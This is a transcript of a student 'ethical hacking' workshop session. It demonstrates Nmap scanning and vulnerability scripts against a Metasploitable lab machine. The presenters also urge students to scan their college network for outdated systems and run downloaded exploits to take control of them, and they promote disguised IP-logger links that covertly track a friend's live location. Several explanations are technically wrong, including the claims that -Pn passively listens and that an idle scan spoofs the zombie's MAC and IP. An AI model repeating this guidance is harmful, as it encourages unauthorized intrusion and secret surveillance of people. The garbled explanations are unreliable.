So, good afternoon, my hackers. Today we will have a great fun. Fun for the fun of knowledge to exploit the world with the knowledge of hacking. In last session we have completed introduction to ethical hacking. Today we will learn about scanning networks and gaining access. Before that, I would let you all to join the Discord channel so that you can enjoy the extra fun activities which are going, like quizzes, memes, best Instagrammer, and lucky winner. So get ready to win the box of knowledge. So now I would like Abhishek Banerjee to start with the event and enlighten your mind.
Oh, thank you, Naba. And so, just a second, let me share my screen. Okay, I hope it's visible. Can you please
Yes, it's
confirm?
visible.
Yeah, thank you. So, uh, good evening, everyone. Today we are going to dive into real hacking stuff. So, first of all, I would like to warn you all that all this theory and practicals demonstrated in the workshop is solely for educational purposes only, and the practicals are conducted under authorized resources, and we are not responsible for any of your actions while trying this out. So, let's start today's lesson. So, today we will be discussing about scanning and reconnaissance. So, what is scanning and reconnaissance for a hacker? A hacker must always know what's going around his world, what's going around him. He must always be aware of what might happen and what is happening. So, what is reconnaissance? Reconnaissance is a mission to obtain information by visual observation or other detection methods about the activities and resources. For example, if you see a bus going to a road, you know that it's going from a point A to point B. You might also know that it's going from the name of the destination as well as the source. Data is the most important thing in our world today, and reconnaissance helps us to analyze it. So there are two types of reconnaissance: active and passive. The main difference between these two, if the basic difference between these two is that in the active reconnaissance, the hacker actually gets into this working stuff. Means if you are seeing the bus going from point A to point B and you want to gather intel, that is intelligence on the bus, so you will just board the bus and check where the bus is stopped, where the stoppages are, who all are boarding the bus, who all are leaving it. So that's called the active reconnaissance, that you are being a part of the network and trying to understand how the network works. Whereas in the passive reconnaissance, it works in a different way. It's something like you are at your home seeing a bus going down the road through the balcony. So this is the example of a passive reconnaissance. That is, you may not know where all it is stopping, but you have to guess it. You are not there in the bus. So the all the people in the bus will not know that you are keeping an eye on them. This is a much better approach for spies and the intelligence agencies. Everyone does this at the first stage. So moving on, so what should we look for in our network? As we know, a hacker can do scan a network in various different ways, like active reconnaissance as well as passive reconnaissance. So what does a hacker look for in the network? He looks for available systems, that is, what all devices are connected to his network other than his device that he can hack into. He will also analyze the open entry points. What is an open entry point? Open entry point is a point of breach or point of failure through which could be exploited by the hacker to gain entry into a unauthorized system. And he will look for vulnerabilities to exploit. He will look for some old OS, some old devices which are vulnerable to exploits. For example, you are a hacker on your college network and you see that there are multiple devices connected through the Wi-Fi. The next thing what you will do is try to analyze those devices. Which of those devices are of the college management, and which of those are of the students? After that, you will try to analyze which of those devices are the laptops and which of those devices are smartphones. So by now, you will be aware of all the available systems in your college network, as well as all the open entry points. That is all the devices, all the laptops and mobile phones. Now, the next thing what you will do is that you will try to try to search for vulnerabilities on those devices to gain access into them, and for any profit or anything, for just for fun or some monetary thing, benefit or something. So you will try to exploit those vulnerabilities. So these are all the 3 points that a hacker mainly focuses on while searching gathering information about his network. So the most widely used network scanner and the most primitive network scanner of all, that is Nmap. So Nmap stands for Network Mapper, and this was a project written in C, C++, Python, and Lua scripts. So it was written way back in 1990s, and it's still widely used by the hacker community to detect the devices connected to the network, the open entry point, the vulnerabilities in the networks, etc. So let's move on to the practical sessions. So first of all, you can search for this help using the Nmap help. So just I need to switch it. So just wait for that thing. Okay. So let me zoom in a bit and let me make it full screen. Okay. I hope it's visible. Nobo, can you please confirm?
I think we should enlarge it more.
Yeah, it's fully full screen, right? Is it okay right now?
Yes.
Okay, fine. Thank you. So we have to type Nmap. This is a utility in the comes pre-installed in Kali. So this stands for Network Mapper. And when you type Nmap and press enter, so you can see all these available options over here. So you can do this different types of scan, like list using ping scan, that list scan, etc. We will look into some of this in a while. So first of all, this is the help menu of the Nmap. So you can access this help menu by typing just simply Nmap, or also you can type let me clear it first, Nmap --- help. So this will give you the same help menu. Another thing, if you want to research a bit more into Nmap and how these options actually work inside the Nmap, you can go to this website of nmap.org, or you can just check out the manual page of the Nmap. You can access the manual page by typing man Nmap. And once you type the man Nmap, then you will see the description of net Nmap and all these things, all these details about this, and every single type of scan will be explained. Means almost every single type of scan will be explained here with examples and all these details. So it helps you a lot, like what this -pn does and -ps does. So I would recommend all of you to go through this manual list once this session is over. Just go to if you want to research in this security domain and you want to excel in this domain, just go through this manual page and read all these what these various functions work and how these various functions work. So let's move on. So next, let's try some basic commands over Nmap. So now I will just go to this vulnerable machine which I have in my PC. So that's named Metasploitable. So I will just log in. So sorry for this small letters. Actually, it's this much only. So please wait. And so this I just logged in using the default username and password of this machine, Metasploitable. That is MSF admin, and username is MSF admin, and the password is also MSF admin. So the shell is open for me now, and just I will type ifconfig. So ifconfig is a command in Linux to check the interface configuration. That is, it does the same thing as ipconfig in Windows. And once you press enter into this ifconfig, you will see this inet address, means all these loopback address and the Ethernet address and all these interfaces, whatever interfaces are connected, if they are assigned some IP address and things, so you can check it out here, as well as the MAC address. So I can see that my IP, private IP, obviously, because this machine is not connected to the internet. So my private IP is 192.168.58.129. So I will just copy this one. Okay, so I will just keep this in mind, 129. I'll just try to ping it once, 192.168, to check out the connectivity of that machine, 129. Okay, so it's replying. So we know that that machine is working right now. So I'll just clear it and proceed with the scan. So for scanning with Nmap, I will just type Nmap and the IP address 192.168.58.129. So this is the IP address I want to scan. All right. Here, instead of this IP address, you can also give the website name whose website you want to scan. That also works. So this IP address is my vulnerable machine IP address, and if you here you need to give the IP address of the machine whom you want to scan. All right. So if you try this out, it won't work because it's my machine and you cannot connect to it. So you need to try it on your machine. So it will show you the results. So let's scan. So as soon as I pressed enter, you can see that all these services and all those things are running over here. Like in port 21, FTP server service is running. FTP stands for File Transfer Protocol. 22, it's SSH, Secure Cell. 23 is Telnet, and 25 SMTP, and all these things are HTTP, RPC blind, and all these services are running on all these different ports. So one more thing I want to tell you is that there are 65536 ports. So 0 to 65535. So all these ports are logical ports in a computer. Every PC has these ports. Every single PC has these ports. These are logical ports, and every single PC has this. So those from 0 to 1024 are registered ports, and those have this numbers are from those that 21, 22, 23. So all these ports, registered ports, are already assigned to some services which are currently running on this vulnerable machine, and some other services also like MySQL and PostgreSQL, VNC, those other machine services are also there. So this is what Nmap actually does. It by default gives you all the ports that are open. The ports, the state of the ports, as well as the services. One more thing, what you must keep in mind is that Nmap by default scans only 1000 common ports. It's not 0 to 1000 or 0 to 999 or something like that. It scans 1000 common ports. All right. So it scans for all these famous services that are generally found open in this vulnerable machines. All those 1000 famous services like VNC, MySQL, SSH, Telnet, etc. So that's it. So let's press clear and just check out the other options of Nmap. So there's the option named -v. So -v stands for verbose. So this will actually print out whatever the Nmap is doing in the background. All right. So if it scans for all the open ports in the network, it needs to know that how these things are working. Okay. So how these things are working and all these things. So if you want to know, you can use this option. So I will just show you how this works. 192.168.58.129. Let me copy this IP address for once because I will be using it again and again. So okay, fine. So in the beginning, you must have seen that it's showing all this working it is doing in the back end, which are not being shown normally to us, like completed ARP ping scan at this time and parallel DNS resolution of one host. So initiating SYN stealth scan at 1717, and now it's scanning these ports and all these things it is doing over here. It is scanning and then sorting it all out in serial order, and then showing us the final result. So that's it. This is how it's working. So just a second, let me clear it. So next, what we have to look into is some other options. So let's check out this PPT once again. Sorry for that. Nmap. Okay, fine. So back in the PPT once again. So there are multiple options of Nmap scans like -sp, that's ping scan the networks, listening machine that only respond to ping. So this option would only scan if you want to scan a whole network. For example, what I did now was I just scanned one single machine whose IP address was known to me. All right. So when I want to scan my whole network to discover what all hosts are present in my network, so I will use this -sp command to discover all the host in my network that are accepting ICMP packets, ICMP or ping packets. Okay, we do ping to discover, means to ensure reachability of a device in a network. So if we can successfully ping a device, that means we can reach the device. You must have done it again and again, like whenever your net is down, you do ping something, ping google.com or something like this. So what this actually does, it shows you the reachability of this google.com. If it is responding to your ping, it means that the site is up and your computer can reach to it through any specific path. So you can see ICMP sequence and time to live on all these things. Values. This is not currently it is not important for us. So it uses this ICMP protocol ping command. So this -sp actually shows you all this. Just a second. Let me. Open this line. Okay, -SP actually shows this does this ping scan throughout our network. So any machine that is up and is responding to ping, you will get it back. So there's another option known as -P. So -P is used to specify the ports in that you want to scan in a target. So as I told, there are 0 to 65535 ports, and so total 65536 actually. So you can specify this 1 to 65535, and then the IP address of the target machine. So you can use this port to specify the ports you want to scan. For example, if I want to scan, just a second, what's this? Okay, sorry. If I want to scan this vulnerable machine for only ports up to like from 1000 to 2000 to let's say 5000. So I want to know only the open ports that have port numbers from 1000 to 5000 in my vulnerable PC with this IP address. So I will use the -P switch over here. So it specifies that do a Nmap scan for ports from 1000 to 5000 on this IP address. So once I press enter, you will see the port ranges that are open in this vulnerable PC that have port numbers from ranging from 1000 to 5000 only are being displayed here. Whereas you might have remembered that previously when we were running this nmap command, it was showing us all the open ports in this network. So all right, so now we know how to do a basic nmap scan, and now we know that how to do a scan to specify this port for specific ports, and we also know how to do a ping scan to know what all hosts are present in our network. So one more thing what we must know is this aggressive scan. We will come back to it later, but before that, I want to discuss with you the -O command. This command is very useful while doing a pen testing or while doing hacking like stuff, because before exploiting a device, you must know what the device is and what operating system the device is running. So I will do nmap -just o, and let's see. Okay, so I just used this -O command tag so to scan for operating systems in this target machine. Excuse me. So in the operating systems in the target machine. So now what the results I get is that running Linux 2.6.x. Okay, so the OSCP version, the OS details, that is the range of this version, that 2.6.9 to 2.6.33, and the network distance is 1 hop. That is directly connected to this our machine. There's no switches or so no routers in between. Means layer 3 switches or no routers in between. So from where the hops take place means where the network breakage takes place. So there's nothing like that. It's directly connected to our network. So this is a important information about this machine, that how far away the device we are scanning is, and also the important details about this machine, that how we can gather more information and how we can make exploits to hack into this machine. So this operating system details helps us a lot about that, and specifically the versions. So one example I would like to give over here is that, for example, what you might be thinking, what is the use of scanning an operating system of a device? All right. So now imagine you are in a college network. Okay, everyone is running Windows 10, latest version of Windows 10. You can't even reach it. It's fully updated, and you can't even reach it. All right. So what you will do is a nmap scan, looking for vulnerable devices. some vulnerabilities, some device that still has Windows 8.1 or Windows 7 or some deprecated version of Windows like Windows XP even. All right. So once you get some device, for example, with a Windows XP loaded in them, what you will do is that you will search for exploits online. There are websites which provide exploits, free exploits, and all these POCs. We will talk about those in our upcoming sessions. So we will tell you there how to do this hackings like a pro hacker. And so for now, just know that there are websites where you can search by these operating systems and search for exploits, and all you need to do with those exploits is just download and run it, and damn, you will get the control of the machine. That's it. That's all you need to do. Just no, just a click. That's it. And this is means this is how this details, this reconnaissance helps us. Okay, so next what I want to discuss is that knew we came to know what O is. So what SV is? So hyphen SV shows the service version, and this is stands for SenScan. So it is a SenScan, stealth scan, so TCP scan like that. And so hyphen SL, so we use this option for to specify a list of IP addresses or a list of hosts for Nmap to scan. For example, if I use like let me clear the terminal first, and if I tile nmap hyphen SL, sorry, capital L, and some hosts.txt. Let's consider that the host.txt considers all the IP addresses, all the host names, etc. of the target devices in our network or whom we want to scan. So we can scan using this hyphen SL command. So it's like that. And hyphen SN is ping scan. So what this actually does is that ping scan is that it actually just scans if the devices are up in a network. All right, so let's try this. So let's try my IP address 192.168.58, sorry, 58.0 slash. Okay, so what I did here was that I tried to ping scan my network, and what I did was I gave my network subnet mask. So this is a class C IP address, and so this subnet mask is /24. Just these are some basics you need to learn, and this is how IP works in the backend. So you can see that Nmap has scanned so many hosts along with the MAC addresses. In here you can see 192.168.58.1, and then 2, then 129. You know that 129 is my device itself. So just to confirm it, just see if config, and here you can see that sorry, it's okay, 129 was that vulnerable metasploitable. 132 is my device. 132 is my device, and 254 is one, and so all these devices are there in my network. All right, so what it does is that you must have observed that it just shows which hosts are up. This is what ping scan is for. It just shows you what hosts are up in the network. All right, so here you won't get any results of open ports or something like that. So you will just get what hosts are up and their MAC addresses. That's it. And some details like it's a VMware machine or it's a main machine or something like that. So you will get. So let's clear it and let's check out the other options, important options that are there. So -pn treats all hosts as online. That's it. Host discovery, it doesn't means how this pn scan actually works. This is a kind of passive reconnaissance. All right, what you must be thinking that Nmap, it we are scanning our network, so we are like always being if a hacker scans being our net in our network and he scans our network, then the administrator will always know that someone is scanning the network. All right. So if, for example, if you scan the college Wi-Fi network in being in the college, so the college network administrator will know that you are scanning. All right. So what this is an active reconnaissance. You might be thinking that, but there are ways to spoof this. Or okay, there are ways to bypass this thing. So one such thing is that -pn. What -pn does, and what is the comparison between -s and pn? So what is a ping scan is that our machine pings every other machine in the network to discover if they are present. Means it generates what all the list of IP addresses that might be in our network and then pings everyone. It sends ICMP packet to everyone. And if they reply, then it knows that this is working, that those hosts are up. Now, if what -pn does is that it doesn't ping anyone. It doesn't ping anyone. All right. What it does, it just stays in our place and it observes. If, for example, uh, it two machines are talking, and our machine is just observing. So that machine is sending some packets to the other machine. So our machine will know that that particular IP address is present over there, and if the machine is talking back, then our machine will be able to know one more IP address. For example, let's take an example for understanding this. Okay, in a class, let's say there's a clear means it's very foggy. Just let's take an imaginary situation. Very foggy, you can't see your classmates. All right. So you go to every single one of them to mark if they're present or absent. Okay. Your friends, you go to one friend, you go to second friend, you go to third friend, you go to fourth friend, and so on. So uh, you do go to every friend and mark if they're present or absent. This is what ping scan is. The device sends pings to everybody, and if they reply, then it marks as yes, it is present. Whereas in a what high sorry it's SN ping scan. So what -pn host discovery skip host discovery is that, consider the same class, very foggy situation, you can't see your classmate, same situation, consider it. And now what you do is that you don't go to any of your friends to mark their attendance, you just sit in your place and just hear. So what they do, your friend 1 talks to friend 2. Okay, so you know there's that person, that guy is present over there. If the second person also talks back, then you know that that second person is also there. All right. So this is how the pn scan works. So just I would like to say that if any one of you is having any difficulty in understanding it, just write it in the comment section. I'll try to my team will intimate me and I will try to clear the doubts as soon as possible over here itself. So that's it. So these are some other options which we would like to use, like PS and PO, and all these options are there. Protocol list and all those things are there. So there is something else, like it's the SS, that TCP SYN scan. What we saw over here, -SS. All right. So there are multiple types of scan. You need to go through this manual page of Nmap to know all these things and all these stuffs, to do some research, quite some research over this, and understand what it actually does. So there is -T to for connect scan. There is SA for hack scan. There is SW for Windows scan. SU for UDP scan. SN TCP null scan. SF fin scan. SX Christmas scan. Sorry, Xmas scan, and all these things are there. So the main types of scan which we use in day-to-day life in hacking is this one: zombie scan, rarely Xmas scan, and which if we are present in the network and have authorized permissions to hack, or we have to authorize permission to let's say pen test into the network, then we use this other tags also, -a hyphen, because these are very very aggressive scans, and the administrator knows it straight away that someone is trying to hack into the systems or something like that. So let's go back to this aggressive scan and let's check what results it gives. So nmap hyphen, so what uh, what flag we use for aggressive scan is -a. That's it. All right. So this will give us the results for our aggressive scan. And let's just a second. Okay, that's it. And Control V. So let's check it out. So this actually scan takes a while to scan, because it scans for everything, every damn thing. Means it scans for all the open ports, it scans for all the vulnerabilities, it scans for every single thing it can get from the machine, every single detail it can get, which almost it scans out of too much information from the machine. Yeah, so it completed. All right. So in the normal scan, normal nmap scan, you must have observed that it's a very small, very brief result. And here you can see that the port 21 is open, service is FTP version. It's showing the version, that is -sv flag is also enabled. It's showing the version of this FTP service. So anonymous FTP login is allowed. So this is a critical vulnerability in the FTPs. So yeah, a hacker can directly log into the FTP server using this. Means it's just anonymous FTP login is allowed, means that you can type in username anonymous in the FTP login page and it will just give you login access. That's it. You need not know any username or password. You will just get direct access into the FTP page. So this is a critical vulnerability over here. Anonymous FTP login. And all this, if you analyze this, all these things are logged in as FTP and all these things are there. So you need to analyze all these results. So at 22 it's a SSH port, open SSH 4.7.1 sorry, P1 version, Debian, Ubuntu, and all this SSH host key and the RSA key and DSA key all are being displayed over here. And SMTP is SMTP. This, all these things are there. DNS are there. So all these vulnerabilities and all these things are you can get over here, and it gives you a lot of things. It gives you a lot of things. If you need to just go one by one, line by line, to analyze what these each thing means and what everything. This, it does trace route, it does some scripts check, it does some discoveries, it does service scan, it does OS scan. Let me check OS scan. Yeah, here is the result from OS scan, the -o tag which we used earlier, if you might remember. So it does everything, means it does many things. Like it's a combined thing of if I remember correctly, it's a combined thing of SV hyphen hyphen o, and it's in the bottom. So because I don't want to delete it, so please uh check it out like this only. So hyphen o, and the trace route command, and what all means the sc command, that is common scripts check. Sorry, sc command, this common scripts check. We will look into this command soon, very in a little while. So all these things are done by the -a. So let's clear this thing and move on. So let me just go to this slides once again. And let's check out this scripts thing. Okay, there's another scan like zombie scan. I will come to it later. Let's first discover the scripts scan. Okay, let me just all right. So this is the script scan. So hyphen sc. Yeah, so hyphen sc is the equivalent to this default script scan. Then you can use hyphen scripts to scan for some specific scripts, and you can use some scripts arguments, some files like NS scripts. So like you can do some script traces, you can update TB and all the script database you can update. Sorry for that. So yeah, so you can do all these things using this hyphen script command you on Nmap sub command. Let's say so. mm, let's just try some scripts out. So let's try the basic script scan hyphen sc hyphen sv, and let's paste the IP address and let it scan. While it scans, I want to show you some basic vulnerabilities, the scanners that we commonly use in a while we do pen testing. So let me open this web browser pretty fast. This it's due to some reason it's slowing down a bit. Okay, okay. So we got it, and we will be using two scripts. That is, one is known as Nmap vulners, Nmap vulners, and you will get this type of link that vulners.com/nmap vulners, and just go to this link. And another thing what we will use is vulscan nmap vulscan. So we will get this okay so yeah, Nobo, is the PPT clear? Was the PPT clear or was it blurry?
Yes, it was clear, but few pages were very much small, so I told you to enlarge it. And now you can enlarge the website so that it can be much clearer to the students or the folks who are attending.
It's all right, right? It's great.
Yes, it's clear.
Yeah, fine. Okay, fine. So yeah, so I need to maybe this. Okay, so this is a vulners.com nmap vulners, and you need to go to this first link of vulscan skipack/vulscan. I will provide both of these links in the PPT, so you can later go to this and just git clone them. So all you need to do is just go to new tab. Okay, fine. Git clone. I just git clone this vulscan thing, and also do the same thing with let's say do the same with vulners also. So let's copy and just okay. So it's yeah, downloading. So just git clone and do this clone this vulners. Okay, fine. So this is like yeah. So the hyphen sc command, what we did use has completed the scan results. So now you can see all these stats like common script scans, common vulnerabilities it has scanned, and all these things. So this command is usually used for that common script scan only. So if you are unable to, if you don't want to use the aggressive scan mode, that is -a. If you don't want all those results, you can just simply use the -sc tag. All right. So this is the partial version of that. Means -a is combined of many other scripts, so it gives a lot of results on the screen. So now we can see that this whole git clone thing is done, that the scripts we require for some checking out the vulnerabilities is done. So what we do now? So now there's a how we use this scripts is that we use -- script stack. So okay, so I need to enlarge it, right? Yeah, so we have downloaded these things and we use the -- script stack to run this. So this is the command which I will be using to scan this, extremely sorry, to scan our vulnerable device. So nmap -- script nmap vulners comma vuln scan. So this is I will use both of the scripts at the same time to scan my vulnerable device, but you can use one by one or as you like it. Like if you want to use only one scan, then nmap -- script vuln scan -sv and then the target machine IP address. All right, so let's go back to this machine and let's start the script scan. Nmap -- script nmap vulners and vuln scan, and let me check the vuln scan spelling, man. vulscn. Okay, vuln scan. Okay, right. Vulscan -sv and then the IP address. Oh, extremely sorry for that. 192.168.58. Let me copy it first. Okay, all right, it's done. So now let's run the scripts. So what it will be doing basically is that it will be going through the pre-built database of vulnerabilities. Means what all services it will detect using the -sv tag. This nmap will detect services using the -sv tag, and then it will push it to the online databases to find vulnerabilities in this thing. So this is the results of no finding, no finding, no findings. Okay, let me check. Okay, 1 db. Yeah, okay, fine. So this was from WorldScan. This was from WorldScan, so it was a failure over there, as you can see. But Wellness did a pretty good job over here, and we found some vulnerabilities ranging from 10. All right, we found vulnerabilities ranging from 10. That's a maximum vulnerability point. It's a very vulnerable thing exploit, and the exploits are available also. Okay, if the exploits are available over here, means the vulnerability ratings are actually rated from 1 sorry, 0 to actually 10. So 0 to 10, 0 is the least vulnerable, it's not vulnerable at all, it means. And if the rating is 10, it's very vulnerable, it's completely exploitable, and it's goddamn vulnerable. So if you just go this, copy this open link, so it will just open this exploit link. So what it is, you can see that it's CVE 2013 1902. You will get the CVE details. It's based on PostgreSQL, and means it's the vulnerability of PostgreSQL. And you can see the reporter over here, and you can read more about these things. You can go to this CVE details, and then you can go to this exploit DB. Exploit DB. Sorry, this won't. I think this won't be zooming. Yeah, exploit DB is a database of exploits. where you can find exploits for all these things, all these CVE scores. So what you need to do is just copy this CVE detail, okay, copy and just search over here. So if you most probably if the exploit ranges from 5 rating to 10 rating, you will there is 90% chance that you will get exploit over there. So it's not showing any result. Let me check some, like, okay, just Google it. Yeah, so you will get some vulnerabilities and some yeah, some exploits over there. You can just search online and you might get some exploit. So if it is the vulnerability is 10, there's almost certainty that you will get exploit, pre-made exploit for exploiting the machines and gaining access into hacking into these machines. All right. So that's how we can use Nmap to gather information and hack into machines. These exploits and things, you need to do some research, and we will be if you face any problems and if you have any doubts on how to hacking to machines with these exploits and anything, we will be always be there for to help you in our Discord channel. So with that, I would like to conclude this Nmap uh, today. So here's a Medium article which you can refer to for and that's known as Nmap cheat sheet. So here you will get all the scanning types and how this works and all these things you will get. So you can it will be of great help to you. All right. So with this we come to an end of this Nmap chapter. We will when we resume, we will be hacking into real machines right now. So please take around, and for now, for the bonus session, I will just hand over the session to Noboratan. Nobo, over to you.
Thank you, Banerjee. I hope everyone has enjoyed the scanning part because scanning is very much important. So if the scanning is not there, then you can't know what are you doing. So coming to the bonus part, which will be very much useful to you, and I hope in last session I have told you that how to make your own tool and get all the id passwords from the system which the user has saved or saved on the internet explorer, google chrome, or anywhere. So that was one of the tool which you can create by your own because it's a 12 line script which was written in python. So today I will tell you another script which will be very much useful, and here it goes. uh, just a minute, let me set it. Yeah, I think it's visible. And oh, so is it visible, Banerjee? Yes, I think. So the bonus of this today's session is like we will create our own application. Like just we have to run a python script, you can run it in your own choice environment or your own choice platform. Just we have to create your new project, and just you have to give him any name. The motive of today's code will be we will just find how to get the correct location of a person by using his phone number. We will also find what is his area code, where does his location is, and which service provider he is using. So moving further, as I have told, I will just let you with the small Python script so that you will not bore. This was the just yes, before doing it, just you have to install one thing, like if you have any Python running environment, then you have to install just pip install phone numbers. Then you will install that, there will an installation procedure, and it's around 2.2 MB, so I don't think so it's very much big file. Then coming back to after installing that particular pip file and phone number part, there is a 10 line of code. As you can see, the output is also here, the output is also here. So just you have to write a 10 lines of code in Python, whereas if this particular code was written in C++, Java or anything else, then it would have a much more line of code. That's why hackers always build some tools. If they want, they always build it in Python only. So I think my screen was visible.
Actually, your slides might be not be changing.
Yes, yes, I
Actually,
got it, I got it. Yes, it was just
kindly do it full screen if possible.
no issue. Just actually, I
Just make
think
it slideshow. Yeah, just make it slideshow. It would be great.
yes.
Yes, just yeah.
So is it visible right now? Right, I think so. It might be having an issue in with my system. So no issues. Like just you have to create a new project. Then you have to give it a name. Then you have to install a command like pip install phone numbers. Then a 2.6 MB file will be installed in whichever environment you want to create. You can create it. Then you can move further with just a 10 slides, 10 lines of code, which will be very much useful for you. Like it's a 10 10 lines of code which will be helpful to find anyone's phone numbers, locations, and which service provider he is using. So there are, which we have to create two files, right? In the main file we have to write this 10 lines of code, and then in the test.py file, in this particular file we have to add the phone number. Whereas when I add my phone number and I just press enter and I just run the code, what I actually found is India and the particular service provider which I am using. Like the output was BSNL and I am using BSNL service provider. So, as I have told, these scripts can be useful and it can be more modified and can be find the user's correct current location. But as we have not studied much on this particular part, so we can only run some types of code which already has been provided by some of the hackers or some of the coders who are present in this world. Like just we have to run because that particular content has already been developed, like IP logger, URL sorter. In the name of this application looks other than what it works. You have to install this. It's just a simple Grinch part. After installing it, you can take a URL of paste an image and get a URL, and then you can send this URL to anyone's phone, and you can just paste it. And then if anyone of your friend click on that part or that link, then from that particular moments onward till you end that link, you will get the user's current location, what he is doing, where he is, and what his location, live locations also, without knowing him. as this type of script run in the background of a user without knowing them. So if you want to do this type of application, or if you want to run this type of application, then you should build a platform or a script which is more stronger. So I think it will be very much useful for you. In the other bonus part, I will let you with a greater session and it can be useful for your life. Thank you. Banerjee, can you please continue from here?
Yeah, sure. Yeah. Uh, sorry, guys. Actually, I just missed this zombie scan part. So I just want to show you, let you know how it works and how what it is actually. So just while, give me some time. Just let me share my screen. Okay. Now, please let this. Yeah,
Yes.
yeah. So yeah. So I hope this screen is visible to everyone. Okay, fine. So I hope this PPT is visible to everyone. Please confirm in the
Yes.
chats.
Yes, it's visible, Banerjee.
Yeah. Okay. Thank you. So actually, I just missed the zombie scan part of Nmap. So this is a very important type of scan. Actually, this sorry, I missed it out. Actually, this what it does, it maintains anonymity of the hacker while scanning this network. Though it is a bit slow, still then it maintains the anonymity of the hacker. So how this zombie scan actually works? So by the name of zombie, you must have already imagine that it's something that is not in its own control. Somebody else is controlling it, or something else is controlling it. This word in hacking is very much in use, like in terms of botnets. There we have zombie machines. Similarly, here we have a zombie scan, which where we use a zombie, also a machine. So that's very much similar to this one, very much similar, but it actually works a bit differently. So how the zombie scan works? So first of all, you need to know that let me grab a paint. Paint. Let me open it up. So I'll just show you. Yeah, so let me make it full screen. Yeah, okay, fine. So here, please neglect my drawing. It's not that good. So actually, let's make two machines. All right. So here, what I am trying to show is TCP communication. If you are in second year, you will be learning this in your DCCN labs. So how this TCP communication actually works. So this is the starter, means if let's say this is a host, and this is the server. Okay, fine. So first of all, what it does is that if it wants to establish this, if this host wants to establish a TCP communication with server, it actually sends a SYN packet. Right. Why it sends, what it does, and all these things are not currently important. It would take a lot of time to explain all these things. For now, just know that this sends host TCP is a three-way handshake process. Means we interchange to establish one TCP connection. Means if I want to connect with you, I have to exchange three packets with you. All right. So first packet is known as SYN. Okay. So next packet is what's coming back from the server as a reply is known as syn ack. All right. So please, my handwriting over this and drawing over this notepad is not good. In real life, also, it's not good. Anyways, so sn ack. So this is what the reply is coming from the server to the host when it's asking for a TCP communication connection. So this host is confirming that after it receives this SYNAC packet, the host sends another packet to this server back, and that is known as ACK. Okay, so these are the three packets: SYNAC. Let me change the color. SYNAC, and ACK. Synergy acknowledgement. Okay, fine. So ACK. So these are the three packets that are being interchanged while communicating in our TCP communication. So if at any point either the host or the server feels that they need to close the or shut down the communication, so what they send is that a reset packet. I'm marking this as red because this will shut down the communication. So reset RST. So if the host wants to terminate the communication, it will send this reset packet to server. If the server wants to stop the communication, it will terminate the communication. It will send reset packet to host. You will read about this in detail over. You can read about go through this topic or over the internet or over the YouTube, or you will be taught about this topic about this communications in your DCCN lab in the second year of engineering in CSE. So this is how the TCP communication actually works. So what happens in a zombie scan is that, let me go back to this slide. So let me close it. Yeah. So what happens in this zombie scan is that this PC actually sends a SYNAC packet directly. It doesn't send a SYN, it doesn't send a ACK, it sends a SYNAC packet. Now, before understanding what's happening over here, you need to understand that SYNAC packets are only sent when the device is receiving a SYN packet. Means, for example, let me take you are there and one of your friend is there. Okay, you are very desperate to talk to him. Okay, so what you do is that you just say hi. Fine. So if the opposite person is saying hi in the first place, so he will know that he has sent you hi and you have just replied to him. All right. But you are directly saying hi or something, hello, or something like that. So he or she will understand that I have not sent it. Why are you trying to communicate or something like that? Okay. So this is what happens in this zombie scan. So if I this you can compare this hi sent by you. Where is my yeah cursor? Yeah. So yeah, this is the cursor. Yeah. So you can compare this hi sent by you by with this SYNAC packet. So the friend doesn't know about your means intentions. Like you sent it out of nowhere means he has not sent you hi and you have just sent it out. So what happens now is that he sends that I have not sent it, just stop the communication. So he just sends this reset packet. Okay, so you need to stop. All right, you have no other option. So similarly, this works. And what the thing is that when the PC sends a SYNAC packet to this printer, let's say, suppose this is a thing I want to scan the zombie I want to use. Uh, So it sends a SYNAC packet to this, and it receives a reset packet with a particular IP ID. Okay, that IP ID is something specific, and if it changes, then uh, we can get to know. So we will discuss about it. So it gets back a reset packet. All right. So now what he does is that he is very tricky. All right. Now you are very tricky. So what you do is that that friend is not talking to you. All right. But you need to get your task done. You need something from him, or you need to get something done. So what you do, you know another friend of yours who is in good terms with that friend, or whom that friend won't suspect. So what you do is that you contact that other friend, that third friend. Okay, and you tell him to contact the friend who is not talking to you. All right, is it clear? So what he does that he then sends a packet. uh, he then talks to him and he gets the work done. So what here is that now let's come back to this situation. How it works once it gets the PC gets the reset packet. What it does that it it changes its MAC address and IP address such that it imitates that zombie. All right, it imitates that zombie and it sends this the third party, a SYN packet from the zombie. So the third person thinks that it is being sent from this valid person. It is being sent from this valid person. So it replies to them, but it replies to that person. Okay, let me get it very clear. Very clear. Let me get it.
Banerjee, it would
So
be much
yeah.
clear if you can enlarge the screen so that it will be much.
Okay. Extremely sorry about that, guys. Extremely sorry about that. I just forgot about it. So how it actually works is that okay, so here we can work over it. I think so. Highlighter, yeah, pen highlighter, laser pointer. Yeah. Okay, fine. So what it does is that it sends this synac packet to this zombie, and it sends again a reset packet. Now third time when it sends a synac packet, so the zombie again sends a reset packet with a different IP ID. So now we know that those two are talking. Okay. Now let's get a simple situation. All right. There are two friends who are very confidential. Okay. Who are very confidential. They are not telling anything about themselves to you. So you want to know about them. So what you do is you talk to one of the friends and tell means you just make him some curious about something. Then you go to the other friend and you then give his name and tell the other friend something else. Okay, then both of them discuss about that topic, and they both come to a final conclusion which is different from what you imposed on them. So now if you contact any one of them, the weaker person, in fact the weaker person who is more open, if you contact the weaker person, he will just open up and he'll tell that we came to this conclusion, and then you will know that both of them are talking and you are not knowing about this. So this is a very complex case, but if you try to understand, it's very easy. So this is how it works. If any doubts regarding this and how this works, actually, please contact us over Discord. This is a very important topic. Means this is how hackers actually hack. So what happens is that if we are trying to target this machine, extremely sorry, just a second. If you are trying to target this machine, this machine receives that this person is trying to gather information about him, but actually you are trying to gather information about him. So this person will not know, this machine will not know that this hacker computer is trying to gather information about him. So let me show you with an example of this nmap command. So this is how the nmap command looks. Nmap-pn. So nmap-pn, why we use pn, I have told you earlier, to hide our means it's a passive type of scan. So we do not send any packets over the internet to discover hosts. We just sit quietly and listen to the packets from where the packets are coming to discover the host. So then -si. Okay, it's not L, it's I actually. So because of this font, it's looking different. So then I have to give the zombie whom I want to use. For example, if I want to use google.com over here, I can do si google.com and then the target IP address. Let me show you an example so you can understand it better. Sorry for that. Root by. Just a second, guys, please. Okay, guys. Okay, fine. Nmap -pn hyphen what specific ports you want to scan or the top ports. Let's go by default. Okay, fine. No, let's not specify it. Have an SI. Shit. So what was my IP address? 192.168.58.129, I think so. Let's give a try. So what you will see now that it will show zombie and it's scanning. Let me try to our post. You can see what's going on. Okay, so this is how it actually works. Actually, you 